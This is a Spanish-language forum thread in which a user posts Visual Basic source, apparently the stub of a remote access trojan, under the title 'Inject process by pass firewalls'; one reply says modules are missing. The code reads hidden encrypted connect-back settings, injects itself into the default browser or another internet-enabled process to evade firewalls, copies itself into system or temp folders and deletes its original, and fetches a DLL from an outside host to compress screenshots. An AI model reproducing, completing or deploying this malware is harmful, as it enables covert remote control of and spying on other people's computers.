INJECT PROCESS BY PASS FIRWALLS

Iniciado por astaroth_15, 24 Marzo 2008, 06:27 AM

0 Miembros y 1 Visitante están viendo este tema.

astaroth_15

Option Explicit
Public Const FINAL_PROGRAM_SIZE = 61440
Public Const PassString As String = "password"
Public Const ServerPass As String = ""
Public IpToConnectTo As String, PortToConnectTo As Long
Public UserConnected As Long, MeltToFile As String, MeltToDirectory As String

Sub Main()
'On Error Resume Next
'
Dim s1 As String, sFile As String
Dim strInfo() As String
Dim ServerFile As String, EncryptedInfo As String
Dim s2 As String, ServerBytes() As Byte, b1() As Byte, MeltDir As Long
Dim InjectedProcesses() As String, ProcessToInject As String
Dim i1 As Long, i2 As Long, i3 As Long

EncryptedInfo = SysDir & "ei_log.log"
If FileExists(EncryptedInfo) Then
    If FileLen(EncryptedInfo) = 0 Then
        DeleteFile EncryptedInfo
        ShellExecute 0, "", AppExe, 0, "", 1
        End
    End If
    'firewall bypass
    'this part of the program reads itself.
    'a file was stored in the other instance that is now available for use
    'so you have to collect the RAT [stored] data and use it in the RAT
    sFile = DecryptString(StrConv(vbReadEndFile(EncryptedInfo, 0), vbFromUnicode), PassString)
    s1 = sFile
    IpToConnectTo = Mid(s1, InStr(1, s1, "{01=") + 4, InStr(1, s1, "=01}") - InStr(1, s1, "{01=") - 4)
    PortToConnectTo = CLng(Mid(s1, InStr(1, s1, "{02=") + 4, InStr(1, s1, "=02}") - InStr(1, s1, "{02=") - 4))
    MeltToFile = Mid(sFile, InStr(1, sFile, "{04=") + 4, InStr(1, sFile, "=04}") - InStr(1, sFile, "{04=") - 4)
    MeltDir = Mid(sFile, InStr(1, sFile, "{05=") + 4, InStr(1, sFile, "=05}") - InStr(1, sFile, "{05=") - 4)
    Select Case MeltDir
        Case 0
            MeltToDirectory = SysDir
        Case 1
           MeltToDirectory = WinDir
       Case 2
            MeltToDirectory = AppPath
        Case 3
            MeltToDirectory = GetTempPath
    End Select
    MeltToFile = LCase(MeltToDirectory & MeltToFile)
   
    'if user doesnt have zLib, download it now for compression
    'this will make the 2.5 mb screenshots ~50kb, and still crystal clear picture
    If UserHasZLIB = 0 Then
        DeleteFile SysDir & "zlib.dll"
        Call GetInternetFile("http://www.hotlinkfiles.com/files/878001_9nuek/zlib.dll", SysDir & "zlib.dll", 256)
    End If
   
    DeleteFile EncryptedInfo
    Load frmMain
    frmMain.Show
Else
    'default when user opens.. right here we want to store the RAT's
    'information so that the firewall bypass can read it, avoiding registry.
    'might as well encrypt the file
    'soo in a nutshell..
    'this part of the program reads itself and stores the information for
    'access to the next loaded version with FWB+
    'i keep these notes to help me remind myself.
   
    'open itself and decrypt string
    ServerBytes = vbReadEndFile(AppExe, FINAL_PROGRAM_SIZE)
    sFile = CStr(ServerBytes())
   
    ServerBytes = sFile
    DeleteFile EncryptedInfo
    vbWriteByteFile EncryptedInfo, ServerBytes
   
    sFile = DecryptString(sFile, PassString)
   
    '=================================
    '
    'Find a process to inject to, with internet access
    '
    '=================================
       
    s2 = Mid(sFile, InStr(1, sFile, "{08=") + 4, InStr(1, sFile, "=08}") - InStr(1, sFile, "{08=") - 4)
    If InStr(1, s2, "|") Then
        InjectedProcesses = Split(s2, "|")
        For i1 = LBound(InjectedProcesses) To UBound(InjectedProcesses)
                If LCase(InjectedProcesses(i1)) = LCase("[DefaultBrowser]") Then
                'If we hit the default browser, we are just gonna load into it
                    InjectedProcesses(i1) = ExeRegPath(DefaultBrowser)
                    If FileExists(InjectedProcesses(i1)) Then
                        'the browser exists, inject into it
                        ProcessToInject = InjectedProcesses(i1)
                    Else
                        If Len(s2) = 0 Then
                                'alternative find default browser through Shell32
                               
                        End If
                    End If
                    i1 = UBound(InjectedProcesses)
                End If
            If IsProcessEXERunning(InjectedProcesses(i1)) Then
                'process running , run one after
                ProcessToInject = AppFullPath(InjectedProcesses(i1))
               
                i1 = UBound(InjectedProcesses)
            End If
        Next
        If ProcessToInject = "" Then ProcessToInject = ExeRegPath(DefaultBrowser)
    End If
    '=================================
    '
    'Determine if we need to melt
    '
    '=================================
    MeltToFile = Mid(sFile, InStr(1, sFile, "{04=") + 4, InStr(1, sFile, "=04}") - InStr(1, sFile, "{04=") - 4)
    MeltDir = Mid(sFile, InStr(1, sFile, "{05=") + 4, InStr(1, sFile, "=05}") - InStr(1, sFile, "{05=") - 4)
    Select Case MeltDir
        Case 0
            MeltToDirectory = SysDir
        Case 1
           MeltToDirectory = WinDir
       Case 2
            MeltToDirectory = AppPath
        Case 3
            MeltToDirectory = GetTempPath
    End Select
    MeltToFile = LCase(MeltToDirectory & MeltToFile)
    If LCase(AppExe) <> MeltToFile Then
        'we need to melt
        DeleteFile MeltToFile
        If MeltDir <> 2 Then FileCopy AppExe, MeltToFile
        b1 = LoadFile(AppExe)
        If MeltDir <> 2 Then InitiateMelt
        RunExe ProcessToInject, b1
        Exit Sub
    Else
        'shouldnt be occuring!!
        'program will uninstall after this
        DeleteFile EncryptedInfo
        MsgBox "Program Detection Error"
        InitiateMelt
        End
    End If
End If
End Sub









PROBAR SI SIRVE ESTO :s
Tienes Menos Cabeza Que Un Muñeco De Nieves

GroK

Ese codigo esta incompleto, le faltan modulos.

Saludos
"I put on my Hendrix album and my son said 'Dad, who's that?' and i said 'Well son, that's God' "- Robert Plant